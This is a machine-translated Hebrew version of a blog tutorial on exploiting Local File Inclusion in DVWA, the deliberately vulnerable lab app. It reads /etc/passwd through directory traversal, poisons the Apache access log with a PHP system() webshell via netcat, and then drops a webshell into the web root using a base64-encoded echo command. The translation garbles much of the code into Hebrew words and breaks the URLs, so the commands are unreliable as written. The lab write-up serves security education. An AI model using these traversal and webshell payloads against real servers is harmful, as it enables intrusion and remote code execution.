יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI)
מחבר:
Ashfaq אנסארי

נסקר על ידי:
דרוג:
5
על מרץ 18, 2013
השתנה לאחרונה:מרץ 18, 2013

תקציר:

הכללת קובץ מקומית (LFI) הוא סוג של פגיעות נמצא לרוב באתרי אינטרנט. זה מאפשר לתוקף כולל קובץ מקומי, בדרך כלל באמצעות סקריפט בשרת האינטרנט. הפגיעות מתרחשת עקב השימוש בקלט משתמש שסופק ללא אימות תקינה.

מבוא

 

בחלקו הראשון של יישום אינטרנט פגיע לעזאזל (DVWA) סדרה, שראינו איך אנחנו יכולים להתקין יישום אינטרנט פגיע לעזאזל (DVWA) על לחזור על עקבותיו 5 R1.
 

אם לא קראת את החלק הראשון, הנה הקישור: http://hacksys.vfreaks.com / עט בדיקות /--web-App-SQL-injection.html הפגיע ארור

 

עכשיו, אנחנו יבדקו את שיטת התקפה אחרת המכונה הכללת קובץ מקומית (LFI).
 

הכללת קובץ מקומית (LFI) הוא סוג של פגיעות נמצא לרוב באתרי אינטרנט. זה מאפשר לתוקף כולל קובץ מקומי, בדרך כלל באמצעות סקריפט בשרת האינטרנט.
 

הפגיעות מתרחשת עקב השימוש בקלט משתמש שסופק ללא אימות תקינה. זה יכול להוביל למשהו מינימאלי ככל פלט את תוכן הקובץ, אך בהתאם לחומרה, לרשימה כמה זה יכול להוביל:
 


1. ביצוע קוד על שרת האינטרנט.
2. ביצוע קוד בצד הלקוח כגון JavaScript שעלול להוביל להתקפות אחרות, כגון צלב site scripting (XSS).
3. מניעת השירות (DoS).
4. גניבת נתונים ומניפולציה של נתונים.

 

עכשיו, הרעיון מאחורי הכללת קובץ מקומית (LFI) שיטת התקפה היא כי, זה מאפשר לתוקף כולל קבצים מקומיים בשרת האינטרנט באמצעות תסריט האינטרנט הפגיע אם שרת האינטרנט יש הרשאה לגשת אליו.
 

כולכם בוודאי חושבים “מה הרבה בזה?”.
 

ובכן, אני חייב לומר שמדובר בעניין חמור מאוד אם שרת האינטרנט אינו מוגדר כהלכה.
 

בואו, רואים כי תוקף הוא תוכל לכלול קובץ מקומי על שרת האינטרנט באמצעות סקריפט PHP הפגיע. זה אומר שהוא יהיה מסוגל לבצע כל קוד PHP שיש בקובץ שלהיכלל.
 

עכשיו, חלק מכם בוודאי חושב “מהו שימוש בביצוע סקריפט PHP על ידי הכללת קבצים מקומי כאשר זה לא עוזר האקר כדי לקבל גישה?”.
 

Apache HTTP Server מספק מגוון רחב של מנגנונים שונים לרישום כל מה שקורה בשרת האינטרנט, מהבקשה הראשונית, בתהליך מיפוי כתובות URL, להחלטה הסופית של החיבור, כולל כל טעויות שייתכן שאירעו בתהליך.
 

הנה קטע מאזהרת האבטחה לציין דף התיעוד של Apache HTTP Server.
 

קשר: http://httpd.apache.org/docs/2.4/logs.html
 

אזהרת אבטחה: כל מי שיכול לכתוב לספרייה שבה httpd האפצ'י הוא כתיבת קובץ יומן יכול כמעט בודאות לקבל גישה לUID שהשרת התחיל בתור, שהיא בדרך כלל שורש. לא נותנים לאנשים גישה כתיבה לספרייה ביומנים מאוחסנים מבלי להיות מודעים לתוצאות. לראות את מסמך הטיפים האבטחה לפרטים. בנוסף, קבצי לוג עשויים להכיל מידע המסופק ישירות על ידי הלקוח, בלי לברוח. לכן, זה אפשרי עבור לקוחות זדוניים כדי להוסיף בקרה-דמויות בקבצי היומן, כך יש להקפיד בהתמודדות עם יומני גלם.

 

לקבלת המידע שלך, בתוך לחזור על עקבותיו 5 R1, the היומן של האפצ'י שרת HTTP קובץ ממוקם ב:
 

/var / log / apache2 / access.log

/var/log/apache2/error.log


 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) קובץ יומן נתיב
 

כבר יש לך לקרוא את אזהרת האבטחה שלמעלה על הרשאות ספריית היומן. אם התוקף הוא מצליח למצוא את נתיב קובץ היומן באמצעות מדריך חציית התקפה, הוא יכול להרעיל את היומן אלה על ידי כתיבת קוד זדוני בקבצי היומן, אם “להיכנס” הרשאות ספרייה וקובץ אינן מוגדרות כהלכה.
 

אנחנו יהיו לראות איך אנחנו יכולים רעל the קבצי יומן בחלק מאוחר יותר של הפוסט הזה.
 

חמוש עם מידע בסיסי על הכללת קובץ מקומית (LFI), בואו להמשיך ולחוות אותו בפגישה מעשית.
 

פתק: בלחזור על עקבותיו 5 R1, the “access.log” הרשאת הגישה של הקובץ עבור “אחרים” מוגדר “אסור”.

 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) קובץ יומן הרשאה
 

עכשיו, בואו לתת “יכול לקרוא” גש לרשות “אחרים”.
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) קריאת קובץ יומן הרשאה
 

אנחנו קובעים “יכול לקרוא” רשות, כך שאנו מסוגלים להפגין הכללת קובץ מקומית (LFI) שיטת התקפה באמצעות יישום אינטרנט פגיע לעזאזל (DVWA).
 

קבל את הגדר ולך.

 

בואו להתחברות יישום אינטרנט פגיע לעזאזל (DVWA) ולהגדיר את ביטחון רמה כדי נמוך.
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) אבטחה לנמוכה
 

לחץ על קובץ הכללה.
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) Tab הכללת קובץ
 

http://192.168.96.128// פגיעויות dvwa / ב /?הדף = include.php

 

כדי לכלול קובץ לערוך ?הדף = index.php ב-URL כדי לקבוע אילו קובץ כלול.
 

בואו לאשר את כתובת האתר הנ"ל היא באמת פגיעה הכללת קובץ מקומית.
 

אנחנו נעשה מדריך חציית ונסה לכלול /etc / passwd קובץ. אם הכללה זו היא מוצלחת, אנו מוצאים את התוכן של /etc / passwd מוצג בדף האינטרנט.
 

http://192.168.96.128// פגיעויות dvwa / ב /?page = .. / .. / .. / .. / .. / etc / passwd

 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) /etc / passwd הכללה
 

זה נראה טוב! היינו יכול לכלול /etc / passwd להגיש ב יישום אינטרנט פגיע לעזאזל (DVWA) בהצלחה כדף האינטרנט הציג את התוכן המלא של /etc / passwd קובץ.
 

המשימה הבאה שלנו היא לנסות לכלול קובץ היומן של האפצ'י. שוב, אנו נשתמש מדריך חציית ונסה לכלול /var / log / apache2 / access.log קובץ.
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) הכללת הגישה התחבר
 

http://192.168.96.128// פגיעויות dvwa / ב /?page = .. / .. / .. / .. / log / apache2 / access.log

 

וואו! זהו יום טוב עבורנו. דברים עובדים בדרך טובה. Apache Web Server של access.log קובץ כלול בהצלחה. זה סימן נהדר שעכשיו, אנחנו יכולים ראש לכיוון ולנסות רעל the יומן השגיאות של האפצ'י.
 

פתק: כאני כבר משתמש BackTrack זה 5 R1 מאז שנה. אני תנקה את access.log ו - error.log כך שאני יכול להראות לך את החלק של הרעיל את קבצי היומן בקלות.    

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) יומנים ברורים

אנחנו מוכנים רעל the access.log קובץ. זהו צעד חשוב כמו זה יעזור התוקף לכלול access.log להגיש ולבצע את קוד PHP מורעל שיהיה כתוב access.log קובץ בשלב זה. ההרעלה יכולה להיות מאושרת על ידי בדיקת התוכן error.log קובץ.
 

פתח מסוף ולהתחבר ל שרת האינטרנט Apache ביציאה 80 באמצעות netcat.
 

1
2
3
שורש @ BT:~ # NC 192.168.96.128 80

לקבל /hazStart<?PHP מערכת(base64_decode($_GET[a]));?>HTTP hazEnd/1.1

 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) יומני רעל
 

עכשיו, מאפשר לאשר אם ההרעלה הייתה מוצלחת. לשם כך, אנחנו אפתח גם access.log ו - error.log להגיש ולנסות להבין אותו ערכיו של.
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) יומני רעל
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) יומני רעל
 

קריר! יש לנו את קבצי לוג המורעלים. כל דבר עבד כצפוי.
 

פתק: כבר כתבו PHP פגז במיני access.log קובץ יומן. עכשיו המניע הבא שלנו הוא לכתוב פגז מיני PHP אחר בתיקיית השורש של שרת אינטרנט אירוח יישומי האינטרנט הפגיעים לעזאזל (DVWA).

 

הנה פקודה שתכתוב PHP פגז מיני בשרת האינטרנט.
 

1
הד "<?PHP מערכת(base64_decode($_GET['P'])); ?>" > ../../webshell.php

 

אם אתה זוכר מיני PHP פגז תסריט שהזרקנו ב access.log קובץ, קוד תסריט הפגז הוא כדלקמן:
 

1
<?PHP מערכת(base64_decode($_GET["'])); ?>

 

אתה יכול לנחש את הצעד הבא שאנו צריכים לעשות אחרי מחפשים את קוד תסריט הפגז?
 

ובכן, עכשיו אנחנו יהיו לקודד את הפקודה כדי לכתוב את תסריט פגז PHP המיני לשורש שרת אינטרנט באמצעות אלגוריתם קידוד base64.
 

כאן היא תכנית פשוטה לפיתון base64 לקודד מחרוזת:
 

1
2
3
4
5
#!/usr / bin / python

base64encodedstr = "" "הד"<?PHP מערכת(base64_decode($_GET['P'])); ?>" > ../../webshell.php """

להדפיס "\nמחרוזת מקודדת: " + base64encodedstr.לְהַצְפִּין("Base64 ',"קפדן") + "\n"

 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) Base64 קידוד
 

The מחרוזת מקודדת base64 הוא כדלקמן:
 

1
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=

 

זה הולך להיות הצעד האחרון לפני שמתקבלים בברכה עם קליפה. 🙂
 

אנו לנווט ל כתובת אתר כדלקמן לכתוב תסריט פגז המיני PHP אל שורש שרת אינטרנט.

http://192.168.96.128// פגיעויות dvwa / ב /?page = .. / .. / .. / .. / log / apache2 / access.log?= ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA / PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA =

 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) PHP Web Shell
 

לבסוף!! יש לנו עשינו את זה בהצלחה. יש לנו נטענים מיני PHP פגז באמצעות פגיעות הכללת קובץ מקומיות בתוך יישום אינטרנט פגיע לעזאזל (DVWA).
 

אני אוהב את האוטומציה וזו הסיבה שאני אוהב את פיתון. פייתון נותן לך כוח מצוין להשיג פשוט מאוד דברים מורכבים.
 

כתבתי סקריפט פייתון שכתבנו כדי להפוך את הניצול הכללת קובץ מקומית (LFI) בתוך יישום אינטרנט פגיע לעזאזל (DVWA).
 

יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI) לנצל סקריפט
 

כאורכו של תסריט הניצול הוא גדול מאוד, יש לי קובץ ZIP כל התסריטים ששמשו בתפקיד זה, והוא זמין להורדה.
 

הורד יישום אינטרנט פגיע לעזאזל – הכללת קובץ מקומית (LFI) לפרסם חומרים:
 

DVWA - סקריפטים לנצל LFI
3.9 KIB
644 הורדות
פרטים ...

 

תודה לך על שהקדשת הזמן שלך כדי לקרוא את הפוסט הזה. אני מקווה שזה עוזר לך. אל תהסס לעזוב בחזרה הערות אם יש לך ספקות, או אם אתה רוצה לדבר על כל דבר שקשור הכללת קובץ מקומית (LFI).
 

46,409 סה"כ צפיות, 20 צפיות היום

שתי הכרטיסיות הבאות לשנות את התוכן בהמשך.

Ashfaq אנסארי

חוקר אבטחה
Ashfaq אנסארי הוא המייסד של HackSys צוות שם קוד "Panthera". הוא חוקר אבטחה עם ניסיון בהיבטים שונים של אבטחת המידע. הוא חיבר "נהג פגיע HackSys קיצוני" ו - "Shellcode מוות". הוא גם כתב ופרסם סקירות טכניות שונות על ניצול תוכנה ברמה נמוכה. עניין הליבה שלו טמון ב "ניצול רמה נמוך", "הנדסה הפוכה", "ניתוח תכנית" ו - "Fuzzing ההיברידית". הוא fanboy של בינה המלאכותית ומערכות לומדות. הוא הפרק להוביל ל null פונה.

ההודעות אחרונות על ידי Ashfaq אנסארי (לראות את כל)

2 תגובות ל “יישום אינטרנט פגיע לעזאזל - הכללת קובץ מקומית (LFI)”

  1. האם זה יהיה אפשרי להראות את ההתקפה ללא אישור הקריאה על access.log. במילים אחרות עוזבים את סט הרשות אסור? מאחר שרוב השרתים יכולים להיות קבוצה זו במקום הראשון. יהיה מאוד מוערך.

    • היי KC,

      למרבה הצער, קובץ היומן צריך להיות לקרוא רשות על access.log.

      אלא אם כן, אנו יכולים לקרוא את הקובץ, אנו לא נוכל לבצע את הפיגוע.

      אולם, אתה יכול לנסות חסימת התקפות שונה.

      תודה.

השאר תגובה

כתובת הדוא"ל שלך לא תפורסם. שדות חובה מסומנים *